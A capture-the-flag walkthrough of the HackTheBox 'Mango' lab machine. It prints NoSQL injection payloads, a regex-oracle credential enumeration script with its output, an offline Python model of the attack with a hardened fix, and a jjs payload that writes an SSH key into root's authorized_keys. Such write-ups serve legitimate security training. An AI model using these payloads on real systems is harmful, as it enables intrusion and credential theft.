HackTheBox “Mango” Walkthrough

Abdullah Kareem
5 min read · Aug 5, 2023


Mango is a medium-difficulty Linux machine on HackTheBox. The foothold is a NoSQL injection in a MongoDB-backed login page: injecting query operators bypasses authentication, and the same injection, used as a boolean oracle by a username/password enumeration script, extracts the stored credentials from the database. One recovered password is reused for SSH access as a low-privileged user, the other lets us switch to the admin user with su, and from there a SUID binary shipped with Java, jjs, runs as root. Writing our SSH public key into the root user's authorized_keys file through jjs gives us a root shell.

Let’s get started! 🚀

Recon & Enumeration

Let’s run a full nmap port and service scan against the target:

Visiting the target by IP on ports 80/443 returned nothing useful, and the nmap results above point at the virtual hostnames the server expects, so we add them to our /etc/hosts file: 10.10.10.162 mango.htb staging-order.mango.htb.

Let’s take a look at staging-order.mango.htb.

Start Burp Suite, submit the login form with the credentials test:test, and intercept the resulting POST request.

After trying various default credentials and basic SQL injection payloads without success, I moved on to NoSQL injection. PayloadsAllTheThings has a comprehensive collection of test payloads; to start, I tried the one below in the login parameters of the intercepted request.

username[$ne]=toto&password[$ne]=toto

After forwarding the modified request, the site redirects us to /home.php. The bracket syntax makes the back end treat each field as an operator object, so the query becomes “username not equal to toto AND password not equal to toto”, which any real account satisfies.

The site is therefore vulnerable to NoSQL injection, which let us bypass the authentication check. Swapping $ne for $regex turns the same login into a boolean oracle (a match redirects to /home.php, a mismatch does not), so we can use this Python script to enumerate the usernames and passwords stored in the database one character at a time.

Starting with potential usernames enumeration:

└─$ python2 nosqli-user-pass-enum.py -u http://staging-order.mango.htb/ -up username -pp password -ep username 
Warning: No method given. Using POST as the method. (You can give the method with -m)
<...omitted...>
Pattern found that starts with 'a'
Pattern found: ad
Pattern found: adm
Pattern found: admi
Pattern found: admin
username found: admin
<...omitted...>
Pattern found that starts with 'm'
Pattern found: ma
Pattern found: man
Pattern found: mang
Pattern found: mango
username found: mango

Potential passwords enumeration:

└─$ python2 nosqli-user-pass-enum.py -u http://staging-order.mango.htb/ -up username -pp password -ep password                 
Warning: No method given. Using POST as the method. (You can give the method with -m)
<...omitted...>
Pattern found that starts with 'h'
Pattern found: h3
Pattern found: h3m
Pattern found: h3mX
Pattern found: h3mXK
Pattern found: h3mXK8
Pattern found: h3mXK8R
Pattern found: h3mXK8Rh
Pattern found: h3mXK8RhU
Pattern found: h3mXK8RhU~
Pattern found: h3mXK8RhU~f
Pattern found: h3mXK8RhU~f{
Pattern found: h3mXK8RhU~f{]
Pattern found: h3mXK8RhU~f{]f
Pattern found: h3mXK8RhU~f{]f5
Pattern found: h3mXK8RhU~f{]f5H
password found: h3mXK8RhU~f{]f5H
<...omitted...>
Pattern found that starts with 't'
Pattern found: t9
Pattern found: t9K
Pattern found: t9Kc
Pattern found: t9KcS
Pattern found: t9KcS3
Pattern found: t9KcS3>
Pattern found: t9KcS3>!
Pattern found: t9KcS3>!0
Pattern found: t9KcS3>!0B
Pattern found: t9KcS3>!0B#
Pattern found: t9KcS3>!0B#2
password found: t9KcS3>!0B#2
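The following Python models the whole chain offline, as an added example that is not code from the original post or from the nosqli-user-pass-enum.py script used above: a PHP-style body parser that turns username[$ne]=toto into an operator object, a vulnerable login that feeds it straight into a MongoDB-style query, the hardened variant that accepts only plain strings, and the $regex prefix walk that the enumeration script performs against the login oracle. The user collection, the parser and the query matcher are constructed stand-ins for the box’s real back end (which is not shown on the page); the credentials in the sample data are the ones recovered above.

```python
import re
import string
from urllib.parse import parse_qsl, urlencode

# Constructed stand-in for the box's MongoDB user collection (not the real
# server code). The values mirror the two accounts recovered in the walkthrough
# so that the enumeration below reproduces the same findings offline.
USERS = [
    {"username": "admin", "password": "t9KcS3>!0B#2"},
    {"username": "mango", "password": "h3mXK8RhU~f{]f5H"},
]

def php_parse_body(body):
    """Mimic PHP's $_POST: 'username[$ne]=x' becomes {'username': {'$ne': 'x'}}.
    This bracket-to-array behaviour is what lets a form field become an operator."""
    post = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        m = re.fullmatch(r"(\w+)\[(\$\w+)\]", key)
        if m:
            post.setdefault(m.group(1), {})[m.group(2)] = value
        else:
            post[key] = value
    return post

def mongo_match(doc, query):
    """Tiny subset of MongoDB query semantics: equality, $ne and $regex."""
    for field, cond in query.items():
        actual = doc.get(field)
        if not isinstance(cond, dict):
            if actual != cond:
                return False
            continue
        for op, arg in cond.items():
            if op == "$ne":
                if actual == arg:
                    return False
            elif op == "$regex":
                if actual is None or re.search(arg, actual) is None:
                    return False
            else:
                raise ValueError("unsupported operator: " + op)
    return True

def vulnerable_login(body):
    """Vulnerable pattern: parsed POST values go straight into the query, so an
    attacker-supplied dict becomes an operator. True stands for the /home.php redirect."""
    post = php_parse_body(body)
    query = {"username": post.get("username"), "password": post.get("password")}
    return any(mongo_match(user, query) for user in USERS)

def hardened_login(body):
    """Fix: only plain strings reach the query, so operators cannot be injected.
    (A real application would also compare password hashes, not plaintext.)"""
    post = php_parse_body(body)
    user, pw = post.get("username"), post.get("password")
    if not isinstance(user, str) or not isinstance(pw, str):
        return False
    return any(mongo_match(u, {"username": user, "password": pw}) for u in USERS)

# Character set the oracle walks through at each position.
ALPHABET = string.ascii_letters + string.digits + string.punctuation

def enumerate_field(field, other, login=vulnerable_login):
    """Recover every stored value of `field` one character at a time.
    Each probe anchors a $regex on the known prefix (escaped, so punctuation such
    as '{' or '>' is matched literally) and neutralises `other` with $ne, so the
    login outcome leaks one bit per request. Returns the set of complete values."""
    def probe(pattern):
        body = urlencode([(f"{field}[$regex]", pattern), (f"{other}[$ne]", "x")])
        return login(body)

    found, stack = set(), [""]
    while stack:
        prefix = stack.pop()
        # A fully anchored pattern matches only if the prefix is a whole value.
        if prefix and probe("^" + re.escape(prefix) + "$"):
            found.add(prefix)
        for ch in ALPHABET:
            candidate = prefix + ch
            if probe("^" + re.escape(candidate)):
                stack.append(candidate)
    return found

if __name__ == "__main__":
    print("bypass:", vulnerable_login("username[$ne]=toto&password[$ne]=toto"))
    print("usernames:", enumerate_field("username", "password"))
    print("passwords:", enumerate_field("password", "username"))
```

Against a live target the probe function would send the same urlencoded body with requests.post and treat a 302 to /home.php as True; the rest of the walk is unchanged. The fully anchored check matters because one stored value can be a prefix of another, and re.escape matters because the recovered passwords contain regex metacharacters.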

Exploitation:

Save the recovered usernames and passwords in separate text files.

Now we feed those two lists to Hydra against the target’s SSH service to find which username/password pair is valid.

We SSH into the target as mango:h3mXK8RhU~f{]f5H.

Privilege Escalation:

We list the SUID binaries on the target with the command below:

find / -perm -4000 -exec ls -l {} + 2>/dev/null

Going through the findings, jjs (the Nashorn JavaScript shell shipped with Java) stands out because it has a GTFOBins entry. Check its permission bits with ls -l: it is SUID root, but its group is admin and only members of that group may execute it, so we first need to switch to the admin user with su, using the admin password t9KcS3>!0B#2, before we can exploit it.

To exploit jjs we use its file-write primitive: the payload writes our generated id_rsa public key into root’s SSH authorized_keys file on the target machine.

export EXPLOIT='var FileWriter = Java.type("java.io.FileWriter");var fw=new FileWriter("/root/.ssh/authorized_keys");fw.write("your id_rsa.pub");fw.close();'

Here we use the public key of our attack box. If there is no key pair yet, generate one with ssh-keygen first and take the public key from ~/.ssh/id_rsa.pub.

Prepare the payload, replacing the placeholder with the contents of your id_rsa.pub:

echo 'var FileWriter = Java.type("java.io.FileWriter");
var fw=new FileWriter("/root/.ssh/authorized_keys");
fw.write("ssh-rsa <your id_rsa.pub key material> kali@kali");
fw.close();' | jjs

Put the payload in a shell script under /tmp on the target machine and run it as the admin user.

Since our public key is now in root’s authorized_keys, we can SSH into the target as root using our private key.

Cheers.


Written by Abdullah Kareem

IT Specialist | Cyber Security Enthusiast | OSWP | eCPPT | CEH | CCNP Enterprise | CCNA | ITILv4